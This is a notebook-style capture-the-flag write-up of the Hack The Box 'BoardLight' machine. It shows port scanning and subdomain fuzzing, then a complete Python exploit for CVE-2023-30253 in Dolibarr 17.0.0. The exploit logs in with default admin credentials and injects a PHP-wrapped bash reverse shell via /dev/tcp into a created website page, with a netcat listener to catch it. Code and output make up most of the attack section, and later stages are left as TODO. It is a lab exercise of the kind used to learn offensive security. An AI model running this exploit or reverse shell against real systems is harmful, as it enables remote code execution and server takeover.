# BoardLight

<https://www.hackthebox.com/machines/boardlight>

## Port Scanning

```bash
sudo nmap -vv -sC -sV -T4 -A 10.129.231.37
```

In [ ]:
from common import scan_ports

scan_ports("10.129.231.37")

Nmap is installed.
Ports:
{'protocol': 'tcp', 'portid': '22'}
{'name': 'ssh', 'product': 'OpenSSH', 'version': '8.2p1 Ubuntu 4ubuntu0.11', 'extrainfo': 'Ubuntu Linux; protocol 2.0', 'ostype': 'Linux', 'method': 'probed', 'conf': '10'}
{'protocol': 'tcp', 'portid': '80'}
{'name': 'http', 'product': 'Apache httpd', 'version': '2.4.41', 'extrainfo': '(Ubuntu)', 'method': 'probed', 'conf': '10'}

OS Matches:
{'name': 'Linux 4.15 - 5.19', 'accuracy': '100', 'line': '70533'}


## Subdomain Discovery

In [ ]:
FFUF_OUTPUT_PATH = "/tmp/ffuf_output.json"

In [3]:
%%script env outfile="$FFUF_OUTPUT_PATH" bash
ffuf -u http://10.129.231.37 -H "Host: FUZZ.board.htb" -w ~/Developer/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -ac -o "$outfile"


        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.231.37
 :: Wordlist         : FUZZ: /Users/tomhu/Developer/SecLists/Discovery/DNS/subdomains-top1million-20000.txt
 :: Header           : Host: FUZZ.board.htb
 :: Output file      : /tmp/ffuf_output.json
 :: File format      : json
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

:: Progress: [102/19966] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::

crm                     [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 140ms]


:: Progress: [19966/19966] :: Job [1/1] :: 399 req/sec :: Duration: [0:00:51] :: Errors: 0 ::


In [ ]:
import json

with open(FFUF_OUTPUT_PATH, "r") as fp:
    ffuf_output = json.load(fp)
print(f"FFUF output ({len(ffuf_output['results'])} in total):")
for entry in ffuf_output["results"]:
    print(f" - {entry['input']['FUZZ']}: {entry['host']}")

assert len(ffuf_output["results"]) == 1

new_host = ffuf_output["results"][0]["host"]

FFUF output (1 in total):
 - crm: crm.board.htb


## Manual Inspection against the Newly Found Website

> References:
>
> - <https://security.snyk.io/vuln/SNYK-PHP-DOLIBARRDOLIBARR-5660595>
> - <https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253>

- Application: `Dolibarr`
- Version: `17.0.0`
- Related CVE: `CVE-2023-30253`

## Exploit the Website

In [ ]:
# Default credentials of Dolibarr
USERNAME = "admin"
PASSWORD = "admin"

In [ ]:
SITE_NAME = "EXPLOIT"
PAGE_NAME = "EXPLOIT"

In [ ]:
from yarl import URL

BASE_URL: URL = URL(f"http://{new_host}")
LOGIN_URL: URL = BASE_URL / "index.php"
ADMIN_URL: URL = BASE_URL / "admin/index.php"
WEBSITE_API_URL: URL = BASE_URL / "website/index.php"
EXPLOIT_PAGE_URL: URL = (
    BASE_URL
    / "public/website/index.php"
    % {
        "website": SITE_NAME,
        "pageref": PAGE_NAME,
    }
)

### Shell as `www-data`

In [ ]:
from typing import Optional

import aiohttp
from bs4 import BeautifulSoup, Tag
from yarl import URL


async def get_csrf_token(
    session: aiohttp.ClientSession, url: URL
) -> Optional[str]:
    async with session.get(url) as resp:
        # Extract CSRF token from the response
        html_content = await resp.text()
        soup = BeautifulSoup(html_content, "html.parser")
        meta_tag = soup.find("meta", attrs={"name": "anti-csrf-newtoken"})

        if meta_tag is not None and isinstance(meta_tag, Tag):
            csrf_token = meta_tag.get("content")
            if csrf_token is not None and isinstance(csrf_token, str):
                return csrf_token

        return None


async def login(
    session: aiohttp.ClientSession,
    url: URL,
    csrf_token: str,
    username: str,
    password: str,
) -> bool:
    data = {
        "token": csrf_token,
        "actionlogin": "login",
        "loginfunction": "loginfunction",
        "backtopage": "",
        "tz": "-8",
        "tz_string": "America/New_York",
        "dst_observed": "1",
        "dst_first": "2025-03-9T01:59:00Z",
        "dst_second": "2025-11-2T01:59:00Z",
        "screenwidth": "1032",
        "screenheight": "1294",
        "dol_hide_topmenu": "",
        "dol_hide_leftmenu": "",
        "dol_optimize_smallscreen": "",
        "dol_no_mouse_hover": "",
        "dol_use_jmobile": "",
        "username": username,
        "password": password,
    }
    resp = await session.post(url, data=data)
    return resp.status == 200


async def create_site(
    session: aiohttp.ClientSession,
    url: URL,
    csrf_token: str,
    site_name: str,
) -> bool:
    data = aiohttp.FormData()
    data.add_field("token", csrf_token)
    data.add_field("backtopage", "")
    data.add_field("dol_openinpopup", "")
    data.add_field("action", "addsite")
    data.add_field("website", "-1")
    data.add_field("WEBSITE_REF", site_name)
    data.add_field("WEBSITE_LANG", "en")
    data.add_field("WEBSITE_OTHERLANG", "")
    data.add_field("WEBSITE_DESCRIPTION", "")
    data.add_field("virtualhost", f"http://{site_name}.local/")
    data.add_field("addcontainer", "Create")

    resp = await session.post(url, data=data)
    return resp.status == 200


async def create_page(
    session: aiohttp.ClientSession,
    url: URL,
    csrf_token: str,
    site_name: str,
    page_name: str,
) -> bool:
    data = aiohttp.FormData()
    data.add_field("token", csrf_token)
    data.add_field("backtopage", "")
    data.add_field("dol_openinpopup", "")
    data.add_field("action", "addcontainer")
    data.add_field("website", site_name)
    data.add_field("pageidbis", "-1")
    data.add_field("pageid", "")
    data.add_field("radiocreatefrom", "checkboxcreatemanually")
    data.add_field("WEBSITE_TYPE_CONTAINER", "page")
    data.add_field("sample", "empty")
    data.add_field("WEBSITE_TITLE", "EXPLOIT")
    data.add_field("WEBSITE_PAGENAME", page_name)
    data.add_field("WEBSITE_ALIASALT", "")
    data.add_field("WEBSITE_DESCRIPTION", "")
    data.add_field("WEBSITE_IMAGE", "")
    data.add_field("WEBSITE_KEYWORDS", "")
    data.add_field("WEBSITE_LANG", "en")
    data.add_field("WEBSITE_AUTHORALIAS", "")
    data.add_field("datecreation", "08/21/2025")
    data.add_field("datecreationday", "21")
    data.add_field("datecreationmonth", "08")
    data.add_field("datecreationyear", "2025")
    data.add_field("datecreationhour", "20")
    data.add_field("datecreationmin", "00")
    data.add_field("datecreationsec", "00")
    data.add_field("htmlheader_x", "")
    data.add_field("htmlheader_y", "")
    data.add_field("htmlheader", "")
    data.add_field("addcontainer", "Create")
    data.add_field("externalurl", "")
    data.add_field("grabimages", "1")
    data.add_field("grabimagesinto", "root")

    resp = await session.post(url, data=data)
    return resp.status == 200


async def edit_page(
    session: aiohttp.ClientSession,
    url: URL,
    csrf_token: str,
    site_name: str,
    lhost: str,
    lport: int,
) -> bool:
    data = aiohttp.FormData()
    data.add_field("token", csrf_token)
    data.add_field("backtopage", "")
    data.add_field("dol_openinpopup", "")
    data.add_field("action", "updatesource")
    data.add_field("website", site_name)
    data.add_field("pageid", "1")
    data.add_field("update", "Save")
    data.add_field("PAGE_CONTENT_x", "8")
    data.add_field("PAGE_CONTENT_y", "2")
    data.add_field(
        "PAGE_CONTENT",
        '<section id="mysection1" contenteditable="true">\n'
        "    <?pHp system(\"bash -c 'bash -i >& /dev/tcp/"
        + lhost
        + "/"
        + str(lport)
        + " 0>&1'\"); ?>\n"
        "</section>\n",
    )

    resp = await session.post(url, data=data)
    return resp.status == 200


async def exploit(
    lhost: str,
    lport: int,
):
    async with aiohttp.ClientSession() as session:
        # Get CSRF token
        csrf_token = await get_csrf_token(session, LOGIN_URL)
        if csrf_token is None:
            raise ValueError("CSRF token not found in the response.")
        print(f"CSRF token: {csrf_token}")

        # Login as admin
        is_logged_in = await login(
            session, LOGIN_URL, csrf_token, USERNAME, PASSWORD
        )
        if not is_logged_in:
            raise ValueError("Login failed.")
        print("Login successful.")

        # Get CSRF token
        csrf_token = await get_csrf_token(session, ADMIN_URL)
        if csrf_token is None:
            raise ValueError("CSRF token not found in the response.")
        print(f"CSRF token: {csrf_token}")

        # Create a website
        is_website_created = await create_site(
            session, WEBSITE_API_URL, csrf_token, SITE_NAME
        )
        if not is_website_created:
            raise ValueError("Failed to create website.")
        print("Website created successfully.")

        # Create a new page
        is_page_created = await create_page(
            session, WEBSITE_API_URL, csrf_token, SITE_NAME, PAGE_NAME
        )
        if not is_page_created:
            raise ValueError("Failed to create page.")
        print("Page created successfully.")

        # Edit the page
        is_page_edited = await edit_page(
            session, WEBSITE_API_URL, csrf_token, SITE_NAME, lhost, lport
        )
        if not is_page_edited:
            raise ValueError("Failed to edit page.")
        print("Page edited successfully.")

        # Access the exploit page
        async with session.get(EXPLOIT_PAGE_URL) as resp:
            if resp.status == 200:
                print("Exploit page accessed successfully.")
            else:
                print(f"Failed to access exploit page: {resp.status}")

Remember to run the following command and wait for a shell

```bash
nc -lnvp 443
```

In [ ]:
await exploit("10.10.14.66", 443)

CSRF token: b6ddae788158f41e004fc0a63355e77d
Login successful.
CSRF token: b6ddae788158f41e004fc0a63355e77d
Website created successfully.
Page created successfully.
Page edited successfully.
Failed to access exploit page: 504


## Shell as `larissa`

(TODO)

## Shell as `root`

(TODO)